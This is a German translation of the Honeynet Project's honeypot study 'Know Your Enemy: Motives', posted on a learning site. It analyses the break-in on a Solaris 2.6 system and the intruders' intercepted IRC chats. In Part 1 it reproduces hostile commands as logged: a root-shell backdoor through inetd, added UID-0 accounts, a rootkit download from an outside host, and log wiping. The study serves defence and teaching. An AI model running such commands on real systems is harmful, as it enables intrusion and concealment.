IT-Academy Logo
Sign Up Login Help
Home - Fortbildung­&Lektüre - Quergeschrieben - Kenne Deinen Feind: Motive



Kenne Deinen Feind: Motive

Die Motive der Schwarzhüte (Hacker), kennen lernen deren Werkzeuge, Taktiken usw.


Autor: Rolf Viehmann (Rolfhub)
Datum: 20-02-2002, 16:41:16
Referenzen: Das englischsprachige Originaldokument findet sich unter http://project.honeynet.org/papers/motives/
Schwierigkeit: Fortgeschrittene
Ansichten: 12198x
Rating: 8.5 (2x bewertet)

Hinweis:

Für den hier dargestellte Inhalt ist nicht der Betreiber der Plattform, sondern der jeweilige Autor verantwortlich.
Falls Sie Missbrauch vermuten, bitten wir Sie, uns unter missbrauch@it-academy.cc zu kontaktieren.

[Druckansicht] [Als E-Mail senden] [Kommentar verfassen]



Kenne deinen Feind: Motive
Die Motive und die Psychologie der Gemeinschaft der Schwarzhüte

Honeynet Project [mailto:project@honeynet.org?Subject=Honeynet Project]
http://project.honeynet.org/
Zuletzt geändert: 27. Juni 2000
Übersetzt von Rolf Viehmann [mailto:rolfhub@web.de] am 19. Juni 2001

Hinweis 1: Ich habe alle URLs in eckige Klammern eingeschlossen, der Übersichtlichkeit zuliebe.
Hinweis 2: Ich habe die neue deutsche Rechtschreibung benutzt.
Hinweis 3: Das englischsprachige Originaldokument findet sich unter [http://project.honeynet.org/papers/motives/].

Dieses Papier ist eine Fortsetzung der Serie "Kenne deinen Feind" [http://project.honeynet.org/papers/enemy/index.html]. Die Serie hat den Zweck, die Werkzeuge und Taktiken der Gemeinschaft der Schwarzhüte kennenzulernen. Im Gegensatz zu den vorhergehenden Papieren, die sich ausschließlich auf das "was" und "wie" der Gemeinschaft der Schwarzhüte konzentrierten, speziell auf die technischen Tools, ihre Benutzung und Implementierung, wird dieses Papier die Motivation und Psychologie der Gemeinschaft der Schwarzhüte erkunden, in ihren ureigenen Worten. Teil 1 beginnt mit der Kompromittierung eines Solaris 2.6 Systems. Teil 2 stellt Informationen bereit, die selten veröffentlicht wurden, eine Aufzeichnung von Konversationen und Aktionen, die in einer Zeitspanne von 14 Tagen stattfanden, die auf die Kompromittierung eines Honigtopf-Systems folgten. Lernen Sie, wie und warum Schwarzhüte Systeme attackieren. Als das Solaris 2.6 System kompromittiert war, installierten die Schwarzhüte einen IRC-Bot auf unserem System. Dieser Bot, konfiguriert und implementiert von dem Schwarzhut, fing alle ihre Konversationen auf dem IRC-Channel auf. Wir überwachten diese Konversationen über eine Periode von zwei Wochen, all dies ist hier enthalten. Dieses Papier kann nicht auf die Gemeinschaft der Schwarzhüte generalisiert werden. Stattdessen präsentieren wir einen konkreten Fall, mit mehreren beteiligten Individuen. Dies sollte ihnen jedoch eine Vorstellung davon geben, wie bestimmte Mitglieder denken und handeln. Dies ist eine gemeinsame Bedrohung, mit der wir alle konfrontiert sind in der Sicherheitsgemeinschaft, und wir hoffen aufrichtig, dass andere Sicherheitsexperten von dieser Arbeit profitieren werden.

Diese Information erhielten wir durch die Nutzung eines Honignetzes. Ein Honignetz ist ein Netzwerk von vielen Honigtöpfen [http://project.honeynet.org/papers/honeypot/index.html], entworfen, um von der Gemeinschaft der Schwarzhüte kompromittiert zu werden. Während manche Honigtöpfe benutzt werden, um die Aufmerksamkeit der Angreifer von legitimen Systemen abzulenken, hat ein Honignetz den Zweck, die Werkzeuge und Taktiken der Gemeinschaft der Schwarzhüte kennen zu lernen. Die meisten Informationen in diesem Dokument wurden unkenntlich gemacht. Speziell Nutzeridentitäten und Passwörter, Kreditkartennummern, und die meisten der Systemnamen der beteiligten Systeme wurden geändert. Jedoch wurden die tatsächlichen technischen Tools und Chat-Sitzungen nicht verändert. All diese Informationen wurden an das CERT und das FBI weitergeleitet, bevor sie veröffentlicht wurden. Außerdem wurden über 370 Mitteilungen an Administratoren von Systemen gesendet, von denen wir denken, dass sie kompromittiert wurden.

Vorwort

[http://project.honeynet.org/papers/motives/forward.html], von Brad Powell

Teil 1: Die Kompromittierung

Eine Standard-Installation von Solaris 2.6 wurde für unseren Honigtopf verwendet. Keine Modifikationen oder Patches wurden auf dem System installiert. Die Verwundbarkeiten, die hier diskutiert werden, existieren in jeder ungepatcheten Standard-Installation von Solaris 2.6. Dies ist der ganze Zweck des Honignetzes, die Verletzbarkeiten der produktiv eingesetzten Systeme zu identifizieren und zu lernen, wie diese ausgenutzt werden. Wenn diese ausgenutzt werden, dann können wir die Tools und Taktiken der Gemeinschaft der Schwarzhüte kennenlernen. Das Honignetz selbst ist eine Umgebung, die dazu entworfen wurde, jede Aktion des Schwarzhutes aufzuzeichnen.

Am 4. Juni 2000 wurde unser Solaris 2.6-Honigtopf kompromittiert und zwar mit der Sicherheitslücke "rpc.ttdbserv Solaris exploit", die es erlaubt, Code durch einen Puffer-Überlauf im "ToolTalk object database server (CVE-1999-0003)" [http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0003] auszuführen. Diese Sicherheitslücke ist auch als Nummer 3 in der SANS-Top Ten-Liste [http://www.sans.org/topten.htm] aufgeführt. Diese Attacke wurde erkannt und gewarnt von snort [http://www.snort.org/], einem Schnüffler-basierten IDS-System.

Jun 4 11:37:58 lisa snort[5894]: IDS241/rpc.ttdbserv-solaris-kill: 192.168.78.12:877 -> 172.16.1.107:32775
("IDS241/rpc.ttdbserv-solaris-kill:" -> [http://dev.whitehats.com/IDS/241])

Der "rpc.ttdbserv exploit" ist eine Puffer-Überlaufs-Attacke, die es dem Fern-User erlaubt, Kommandos auf dem System als root auszuführen. Das nachfolgende Kommando wurde ausgeführt, welches dem Schwarzhut eine Hintertür öffnete. Der Service "ingreslock" (in /etc/services vordefiniert als Port 1524) wird einer Datei namens "/tmp/bob" hinzugefügt, dann wird inetd mit der Konfigurationsdatei "/tmp/bob" ausgeführt. /bin/sh ist dann an Port 1524 gebunden und läuft als root, was dem Fern-User root-Zugriff gibt.

/bin/ksh -c echo 'ingreslock stream tcp nowait root /bin/sh sh -i' >>/tmp/bob ; /usr/sbin/inetd -s /tmp/bob.

Als der Schwarzhut diese Hintertür geöffnet hatte, connectete er auf Port 1524, griff auf eine Shell als root zu, und führte die folgenden Kommandos aus. Er erstellte zwei Userkonten, so dass er per Telnet wieder hineingelangen konnte. Beachten Sie die Fehler und Kontrollzeichen, die Shell auf Port 1524 hat keine richtige Umgebung.

# cp /etc/passwd /etc/.tp;
^Mcp /etc/shadow /etc/.ts;
echo "r:x:0:0:User:/:/sbin/sh" >> /etc/passwd;
echo "re:x:500:1000:daemon:/:/sbin/sh" >> /etc/passwd;
echo "r::10891::::::" >> /etc/shadow;
echo "re::6445::::::" >> /etc/shadow;
: not found
# ^M: not found
# ^M: not found
# ^M: not found
# ^M: not found
# ^M: not found
# who;
rsides console May 24 21:09
^M: not found
# exit;

Unser Schwarzhut hat jetzt zwei Konten auf unserem Kompromittieren System. Er kann sich jetzt per Telnet als User "re" einloggen, und dann zum Superuser "r" werden, der die UID 0 hat, also root-Zugriff bekommt. Wir werden uns jetzt die tatsächlichen Tastatureingaben anschauen, die der Schwarzhut eingegeben hat, und noch mehr.

!"' !"P#$#$'LINUX'

SunOS 5.6

login: re
Choose a new password.
New password: abcdef
Re-enter new password: abcdef
telnet (SYSTEM): passwd successfully changed for re
Sun Microsystems Inc. SunOS 5.6 Generic August 1997
$ su r

Unser Schwarzhut hat jetzt root-Zugriff. Wie üblich ist der nächste Schritt, das rootkit zu besorgen und die Kontrolle über das System zu erlangen. Wir sehen, dass der Schwarzhut zuerst ein "verstecktes" Verzeichnis erstellt, um das rootkit zu verstecken.

# mkdir /dev/".. "
# cd /dev/".. "

Nachdem das Verzeichnis erstellt ist, besorgt der Schwarzhut das rootkit von einem anderen System.

# ftp shell.example.net
Connected to shell.example.net.
220 shell.example.net FTP server (Version 6.00) ready.
Name (shell.example.net:re): j4n3
331 Password required for j4n3.
Password:abcdef
230 User j4n3 logged in.
ftp> get sun2.tar
200 PORT command successful.
150 Opening ASCII mode data connection for 'sun2.tar' (1720320 bytes).
226 Transfer complete.
local: sun2.tar remote: sun2.tar
1727580 bytes received in 2.4e+02 seconds (6.90 Kbytes/s)
ftp> get l0gin
200 PORT command successful.
150 Opening ASCII mode data connection for 'l0gin' (47165 bytes).
226 Transfer complete.
226 Transfer complete.
local: l0gin remote: l0gin
47378 bytes received in 7.7 seconds (6.04 Kbytes/s)
ftp> quit
U221 Goodbye.

Nachdem das rootkit erfolgreich heruntergeladen ist, wird das kit entpackt und installiert. Beachten Sie, wie das gesammte rootkit installiert wird, indem ein einziges Script, "setup.sh" [http://project.honeynet.org/papers/motives/setup.txt], ausgeführt wird. Das Script ruft auch ein anderes Script auf, "secure.sh" [http://project.honeynet.org/papers/motives/secure.txt]. Sie können das gesammte Solaris rootkit, das bei diesem Angriff benutzt wurde, hier herunterladen [http://project.honeynet.org/papers/motives/sun2.rootkit.tar.gz].

# tar -xvf sun2.tar
x sun2, 0 bytes, 0 tape blocks
x sun2/me, 859600 bytes, 1679 tape blocks
x sun2/ls, 41708 bytes, 82 tape blocks
x sun2/netstat, 6784 bytes, 14 tape blocks
x sun2/tcpd, 19248 bytes, 38 tape blocks
x sun2/setup.sh, 1962 bytes, 4 tape blocks
x sun2/ps, 35708 bytes, 70 tape blocks
x sun2/packet, 0 bytes, 0 tape blocks
x sun2/packet/sunst, 9760 bytes, 20 tape blocks
x sun2/packet/bc, 9782 bytes, 20 tape blocks
x sun2/packet/sm, 32664 bytes, 64 tape blocks
x sun2/packet/newbc.txt, 762 bytes, 2 tape blocks
x sun2/packet/syn, 10488 bytes, 21 tape blocks
x sun2/packet/s1, 12708 bytes, 25 tape blocks
x sun2/packet/sls, 19996 bytes, 40 tape blocks
x sun2/packet/smaq, 10208 bytes, 20 tape blocks
x sun2/packet/udp.s, 10720 bytes, 21 tape blocks
x sun2/packet/bfile, 2875 bytes, 6 tape blocks
x sun2/packet/bfile2, 3036 bytes, 6 tape blocks
x sun2/packet/bfile3, 20118 bytes, 40 tape blocks
x sun2/packet/sunsmurf, 11520 bytes, 23 tape blocks
x sun2/sys222, 34572 bytes, 68 tape blocks
x sun2/m, 9288 bytes, 19 tape blocks
x sun2/l0gin, 47165 bytes, 93 tape blocks
x sun2/sec, 1139 bytes, 3 tape blocks
x sun2/pico, 222608 bytes, 435 tape blocks
x sun2/sl4, 28008 bytes, 55 tape blocks
x sun2/fix, 10360 bytes, 21 tape blocks
x sun2/bot2, 508 bytes, 1 tape blocks
x sun2/sys222.conf, 42 bytes, 1 tape blocks
x sun2/le, 21184 bytes, 42 tape blocks
x sun2/find, 6792 bytes, 14 tape blocks
x sun2/bd2, 9608 bytes, 19 tape blocks
x sun2/snif, 16412 bytes, 33 tape blocks
x sun2/secure.sh, 1555 bytes, 4 tape blocks
x sun2/log, 47165 bytes, 93 tape blocks
x sun2/check, 46444 bytes, 91 tape blocks
x sun2/zap3, 13496 bytes, 27 tape blocks
x sun2/idrun, 188 bytes, 1 tape blocks
x sun2/idsol, 15180 bytes, 30 tape blocks
x sun2/sniff-10mb, 16488 bytes, 33 tape blocks
x sun2/sniff-100mb, 16496 bytes, 33 tape blocks
# rm sun2.tar
# mv l0gin sun2
#cd sun2
#./setup.sh
hax0r w1th K1dd13
Ok This thing is complete :-)

Das Install-Script für das rootkit "reinigt" hier zuerst die log-Dateien, um die Informationen, die den Angriff des Schwarzhutes betreffen, zu löschen.

- WTMP:
/var/adm/wtmp is Sun Jun 4 11:47:39 2000
/usr/adm/wtmp is Sun Jun 4 11:47:39 2000
/etc/wtmp is Sun Jun 4 11:47:39 2000
/var/log/wtmp cannot open
WTMP = /var/adm/wtmp
Removing user re at pos: 1440
Done!
- UTMP:
/var/adm/utmp is Sun Jun 4 11:47:39 2000
/usr/adm/utmp is Sun Jun 4 11:47:39 2000
/etc/utmp is Sun Jun 4 11:47:39 2000
/var/log/utmp cannot open
/var/run/utmp cannot open
UTMP = /var/adm/utmp
Removing user re at pos: 288
Done!
- LASTLOG:
/var/adm/lastlog is Sun Jun 4 11:47:39 2000
/usr/adm/lastlog is Sun Jun 4 11:47:39 2000
/etc/lastlog cannot open
/var/log/lastlog cannot open
LASTLOG = /var/adm/lastlog
User re has no wtmp record. Zeroing lastlog..
- WTMPX:
/var/adm/wtmpx is Sun Jun 4 11:47:39 2000
/usr/adm/wtmpx is Sun Jun 4 11:47:39 2000
/etc/wtmpx is Sun Jun 4 11:47:39 2000
/var/log/wtmpx cannot open
WTMPX = /var/adm/wtmpx
Done!
- UTMPX:
/var/adm/utmpx is Sun Jun 4 11:47:39 2000
/usr/adm/utmpx is Sun Jun 4 11:47:39 2000
/etc/utmpx is Sun Jun 4 11:47:39 2000
/var/log/utmpx cannot open
/var/run/utmpx cannot open
UTMPX = /var/adm/utmpx
Done!
./setup.sh: ./zap: not found

Nachdem die log-Dateien "gereinigt" sind, ist der nächste Schritt, unser System zu sichern (wie nett von ihnen). Sie wissen, dass wir eine leichte Beute sind und sie wollen nicht, dass irgend jemand ihr kompromittiertes System ruiniert.

./secure.sh: rpc.ttdb=: not found
#: securing.
#: 1) changing modes on local files.
#: will add more local security later.
#: 2) remote crap like rpc.status , nlockmgr etc..
./secure.sh: usage: kill [ -sig ] id ... | -l []
./secure.sh: usage: kill [ -sig ] id ... | -l []
#: 3) killed statd , rpcbind , nlockmgr
#: 4) removing them so they ever start again!
5) secured.
207 ? 0:00 inetd
11467 ? 0:00 inetd
cp: cannot access /dev/.. /sun/bot2
kill these processes@!#!@#!
cp: cannot access lpq
./setup.sh: /dev/ttyt/idrun: cannot execute

Als nächstes wird ein IRC-Proxy aufgerufen. Bizarr ist, dass das Script den Prozess später killt. Ich weiß nicht, warum.

Irc Proxy v2.6.4 GNU project (C) 1998-99
Coded by James Seter :bugs-> (Pharos@refract.com) or IRC pharos on efnet
--Using conf file ./sys222.conf
--Configuration:
Daemon port......:9879
Maxusers.........:0
Default conn port:6667
Pid File.........:./pid.sys222
Vhost Default....:-SYSTEM DEFAULT-
Process Id.......:11599
Exit ./sys222{7} :Successfully went into the background.

Es werden noch weitere Dateimodifikationen ausgeführt. Aus der Ausgabe des Scriptes kann man nicht entnehmen, dass Trojaner-binaries kopiert werden, einschließlich /bin/login, /bin/ls, /usr/sbin/netstat, und /bin/ps. Ich kann nur empfehlen, dass sie sich den Quellcode der Scripte "setup.sh" [http://project.honeynet.org/papers/motives/setup.txt] und "secure.sh" [http://project.honeynet.org/papers/motives/secure.txt] anschauen, um zu sehen, was tatsächlich passiert. Eines Tages könnten Sie ein System vor sich haben, das mit einem ähnlichen Kit "bearbeitet" wurde.
# kill -9 11467
# ps -u root |grep |grep inetd inetd
   207 ?        0:00 inetd
# ..U/secure.sh/secure.sh
./secure.sh: rpc.ttdb=: not found
#: securing.
#: 1) changing modes on local files.
#: will add more local security later.
#: 2) remote crap like rpc.status , nlockmgr etc..
./secure.sh: usage: kill [  -sig ] id ... | -l []
./secure.sh: usage: kill [  -sig ] id ... | -l []
./secure.sh: usage: kill [  -sig ] id ... | -l []
./secure.sh: usage: kill [  -sig ] id ... | -l []
#: 3) killed statd , rpcbind , nlockmgr
#: 4) removing them so they ever start again!
5) secured.
# ppUs -u s -u U||U grep  grep ttUtdbtdb
Ups: option requires an argument -- u
usage: ps [ -aAdeflcj ] [ -o format ] [ -t termlist ]
        [ -u userlist ] [ -U userlist ] [ -G grouplist ]
        [ -p proclist ] [ -g pgrplist ] [ -s sidlist ]
  'format' is one or more of:
        user ruser group rgroup uid ruid gid rgid pid ppid pgid sid
        pri opri pcpu pmem vsz rss osz nice class time etime stime
        f s c tty addr wchan fname comm args
# ppUs -s -UAdj | grep ttdbAdj | grep ttdb
Zuletzt startet unser Schwarzhut einen IRC-Bot. Der Zweck dieses Bots ist es, sicherzustellen, dass sie Operator auf dem IRC-Channel ihrer Wahl bleiben. Der Bot zeichnete auch alle Konversationen auf dem IRC-Channel auf. Es ist dieser Bot, den sie auf unserem kompromittierten System installierten, der ihre IRC-Chats in unser Netzwerk weiterleitete.

# ../me -f bot2
init: Using config file: bot2
EnergyMech 2.7.1, December 2nd, 1999
Starglider Class EnergyMech
Compiled on Jan 27 2000 07:06:04
Features: DYN, NEW, SEF
init: Unknown configuration item: "NOSEEN" (ignored)
init: Mechs added [ save2 ]
init: Warning: save2 has no userlist, running in setup mode
init: EnergyMech running...
# exit;
$ exit

Als der Bot platziert war, ließen sie unser System in Ruhe. Es war dieser Bot, der alle ihre Konversationen auffing (siehe Teil 2 weiter unten). Für zusätzliche Informationen über IRC und wie die Gemeinschaft der Schwarzhüte IRC und Bots benutzt, empfehlen wir das Papier "Tracking Hackers on IRC" [http://theorygroup.com/Theory/irc.html] von David Brumley. Im Verlauf der folgenden Woche kehrten sie mehrmals zurück, nur um sich zu vergewissern, dass sie noch immer Zugriff hatten. Eine Woche später, am 11. Juni, verbanden sie sich wieder und versuchten, das System für Denial of Service-Attacken zu nutzen. Das Honignetz ist jedoch so eingestellt, jeden Versuch zu Unterbinden, das Honignetz als Basis für die Attacke auf andere Systeme zu nutzen. Alle Versuche, das Honignetz für eine Denial of Service-Attacke zu nutzen, wurden automatisch geblockt.

Wir haben hier vielfach genutzte Tools und Taktiken der Gemeinschaft der Schwarzhüte kennengelernt. Unser Schwarzhut scannte das Internet zufällig nach bekannten Verwundbarkeiten ab (in diesem Fall "rpc.ttdbserv"). Einmal identifiziert, kompromittierten sie schnell das System und installierten ein rootkit, wobei sie Script-Tools nutzten. Als sie erst einmal die Kontrolle hatten, installierten sie einen Bot, wahrscheinlich, um sicherzustellen, das sie ihre Operatorenrechte auf dem IRC-Channel ihrer Wahl behielten. Ungewöhnlich sind die zwei Wochen IRC-Chat-Sitzungen, die ihr Bot für uns aufgefangen hat. Im nächsten Teil dieses Papiers werden wir die Motivationen und die Psychologie der Gemeinschaft der Schwarzhüte erkunden, in ihren eigenen Worten. Wenn Sie besorgt sind, dass ihre Systeme auf ähnliche Weise kompromittiert worden sind, schauen Sie sich diese Checkliste an [http://project.honeynet.org/papers/motives/check.txt]. Sie beschreibt, was Sie überprüfen sollten, und Links, wie man bei einem kompromittierten System verfahren sollte.

Teil 2: Die IRC-Chat-Sitzungen

Unten befinden sich die tatsächlichen Chat-Sitzungen der Gemeinschaft der Schwarzhüte, speziell zwei Individuen, die wir "D1ck" (lies "Dick") und "J4n3" (lies "Jane") nennen werden. Die meisten ihrer Chats werden sich auf dem IRC-Channel ereignen, den wir "K1dd13" (lies "Kiddie") nennen werden. Sie werden von den Aktivitäten der beiden Hauptdarsteller lesen, und noch einiges mehr. Die Chat-Sitzungen sind nach Tagen geordnet, wie unten aufgelistet. Wir empfehlen, dass Sie sie in ihrer Reihenfolge lesen, so dass Sie die Zusammenhänge besser verstehen. IRC-Channels, IRC-Nicks, Systemnamen und IP-Adressen sind unkenntlich gemacht worden. Alle System-IP-Adressen sind mit welchen nach RFC 1918 ersetzt worden, alle System-Domain-Namen sind mit "example" ersetzt worden, alle Kreditkartennummern sind mit "xxxx" ersetzt worden. Alle Ähnlichkeiten der IRC-Channels oder IRC-Nicks mit der realen Welt sind purer Zufall. Seien Sie gewarnt, ein Teil der Sprache ist missbräuchlicher Natur, was wir nicht verändert haben. Auch werden manchmal einige der Schwarzhüte andere Sprachen sprechen, was wir, wann immer möglich, ins Englische übersetzt haben. Wenn Sie diese Chat-Sitzungen lesen, sollten Sie beachten, welche Wissenslücken bezüglich Netzwerken die Schwarzhüte offenbaren. Sie werden oft sehen, wie sie versuchen, die fundamentalsten Unix-Kenntnisse herauszufinden. Und doch sind sie in der Lage, eine große Anzahl von Systemen zu kompromittieren oder zu beschädigen. Dies ist eine Bedrohung, die man nicht auf die leichte Schulter nehmen sollte.

Tag 1, 4. Juni [http://project.honeynet.org/papers/motives/day1.txt]
Unsere Chat-Sitzung beginnt mit der Diskussion über den Aufbau eines Archives und das Teilen von Verwundbarkeiten, die gegen potentielle Ziele verwendet werden sollen.

Tag 2, 5. Juni [http://project.honeynet.org/papers/motives/day2.txt]
Heute teilen D1ck und J4n3 Verwundbarkeiten und Denial of Service-Attacken. Beachten Sie, wie sie damit prahlen, wie viele "blists" (broadcast amplifier networks) sie für ihre Attacken zur Verfügung haben. Es scheint, als ob einer von ihnen Linux-Rechner im .edu Land zum Ziel hat. Sie diskutieren die Nutzung von neuen rootkits für Linux und sparc.

Tag 3, 6. Juni [http://project.honeynet.org/papers/motives/day3.txt]
D1ck und J4n3 prahlen mit den Systemen, gegen die sie Denial of Service-Attacken gestartet haben. Später zeigt D1ck J4n3, wie man ein Laufwerk mountet(!). Dann diskutieren sie sniffit (wie man es nutzt) und zuletzt sucht D1ck verzweifelt nach einer Irix Verwundbarkeit und einem rootkit.

Tag 4, 7. Juni [http://project.honeynet.org/papers/motives/day4.txt]
D1ck und J4n3 entscheiden, dass sie "India" mit Denial of Service-Attacken und bind-Verwundbarkeiten angreifen wollen. Später DoSen sie andere IRC-Mitglieder, die sie irritieren.

Tag 5, 8. Juni [http://project.honeynet.org/papers/motives/day5.txt]
D1ck bittet J4n3, für ihn drei Systeme anzugreifen. D1ck und sein Kumpel Sp07 versuchen, herauszufinden, wie ein sniffer arbeitet "hmm, muss es nicht das selbe Netzwerk sein?".

Tag 6, 9. Juni [http://project.honeynet.org/papers/motives/day6.txt]
Unser Team war beschäftigt, es sieht aus, als ob D1ck über 40 Systeme gerootet hat. Wenn sie genügend Systeme scannen, können und werden sie root-Rechte bekommen.

Tag 7, 10. Juni [http://project.honeynet.org/papers/motives/day7.txt]
Kein aufregender Tag. D1ck zeigt einem neuen k1dd13, wie man die "sadmind"-Verwundbarkeit benutzt. Wir sind nicht sicher, ob D1ck selbst weiß, wie man das macht.

Tag 8, 11. Juni [http://project.honeynet.org/papers/motives/day8.txt]
D1ck und J4n3 besprechen Systeme, die sie kontrollieren und Leute die sie DoSen wollen. D1ck entdeckt den "Ping of Death" und denkt, er wäre sehr "k3wl".

Tag 9, 12. Juni [http://project.honeynet.org/papers/motives/day9.txt]
Sieht aus, als ob D1ck seinen großen Tag hat, er findet einen ISP und bekommt Zugriff zu ihrer Abrechnung und über 5000 Userkonten. Nun versuchen sie, heraus zu finden, wie sie diese knacken können.

Tag 10, 13. Juni [http://project.honeynet.org/papers/motives/day10.txt]
Sp07 stößt heute zu der Gruppe. Nicht gerade das freundlichste Individuum für die Internetgemeinschaft. Er scheint auch etwas Abneigung gegenüber "India" zu haben.

Tag 11, 14. Juni [http://project.honeynet.org/papers/motives/day11.txt]
Sie fangen an, User-Passwörter zu knacken und auf persönliche Konten zuzugreifen.

Tag 12, 15. Juni [http://project.honeynet.org/papers/motives/day12.txt]
Auch mit Übersetzungen aus dem Rumänischen [http://project.honeynet.org/papers/motives/day12-rom.txt]
D1ck und J4n3 versuchen, Kreditkartennummern zu finden, damit sie einige Domainnamen kaufen können.

Tag 13, 16. Juni [http://project.honeynet.org/papers/motives/day13.txt]
Auch mit Übersetzungen aus dem Rumänischen [http://project.honeynet.org/papers/motives/day13-rom.txt]
D1ck und J4n3 hängen immer noch im Kreditkarten-Channel 'rum. Mitglieder tauschen Kreditkarten aus, sowie Shell-Konten und Porno-Seiten. Zum Abschluss der Chat-Sitzung konzentrieren sich die beiden auf ihre Webseite.

Tag 14, 17. Juni [http://project.honeynet.org/papers/motives/day14.txt]
Auch mit Übersetzungen aus dem Rumänischen [http://project.honeynet.org/papers/motives/day14-rom.txt]
D1ck und J4n3 reden darüber, wie man Konten auf einer Linux-Kiste bekommt, reden weiter über Kreditkarten und fahren damit fort, eine Webseite zu erstellen.

Wir haben uns soeben 14 Tage im Leben der Gemeinschaft der Schwarzhüte angesehen. Dies soll nicht bedeuten, dass alle Schwarzhüte so denken und handeln. Tatsächlich haben wir uns auf einige wenige Individuen konzentriert. Jedoch hoffen wir, dass diese Informationen Ihnen einen Eindruck davon vermitteln, wozu viele in der Gemeinschaft fähig sind. Sie mögen technisch nicht sehr kompetent sein, manche verstehen vielleicht nicht einmal die Werkzeuge, die sie benutzen. Jedoch können sie dramatische Resultate erzielen, indem sie sich auf sehr viele Systeme konzentrieren. Dies ist eine nicht zu unterschätzende Bedrohung. Sie interessieren sich nicht dafür, welche Schäden sie anrichten können. Sie konzentrieren sich nur auf ihre Ziele.

Schlussfolgerung

Der Zweck dieses Papiers ist es, Ihnen einen Einblick in die Motive und die Psychologie der Gemeinschaft der Schwarzhüte zu geben. Das Papier begann mit der Kompromittierung eines Solaris 2.6 Honigtopfes. Es demonstrierte die Ausnutzung eines verwundbaren Systems aus der Ferne. Als es erst einmal kompromittiert war, wurde das System mit einem rootkit kontrolliert, auch ein in diesen Kreisen vielgenutztes Tool. Was dieses Papier einzigartig macht, ist der Einblick den sie in die Mentalität der Schwarzhüte bekommen. Sie sahen hier, in ihrer eigenen Ausdrucksweise, wie sie denken und handeln, und wie sie Systeme angreifen und beschädigen. Sie testen zufällig zahlreiche Systeme und greifen das schwächste an, das sie finden können. Wenn Sie ihre Motive und Methoden verstehen, können sie sich besser gegen diese Bedrohung schützen.

Anerkennungen

Dieses Papier ist das Resultat der Arbeit und Forschung des Honeynet Project [http://project.honeynet.org/], eine kleine Gruppe von Sicherheitsexperten, die versuchen, die Tools und Taktiken der Gemeinschaft der Schwarzhüte zu erlernen und diese Erkenntnisse mit ihresgleichen zu teilen.

Wir möchten Alan Paller von SANS [http://www.sans.org/] danken. Er ist kein Mitglied des Honeynet Project, er hat jedoch geholfen, diese Nachforschungen Realität werden zu lassen.


[back to top]



Userdaten
User nicht eingeloggt

Gesamtranking
Werbung
Datenbankstand
Autoren:04511
Artikel:00815
Glossar:04116
News:13565
Userbeiträge:16552
Queueeinträge:06248
News Umfrage
Ihre Anforderungen an ein Online-Zeiterfassungs-Produkt?
Mobile Nutzung möglich (Ipone, Android)
Externe API Schnittstelle/Plugins dritter
Zeiterfassung meiner Mitarbeiter
Exportieren in CSV/XLS
Siehe Kommentar



[Results] | [Archiv] Votes: 1158
Comments: 0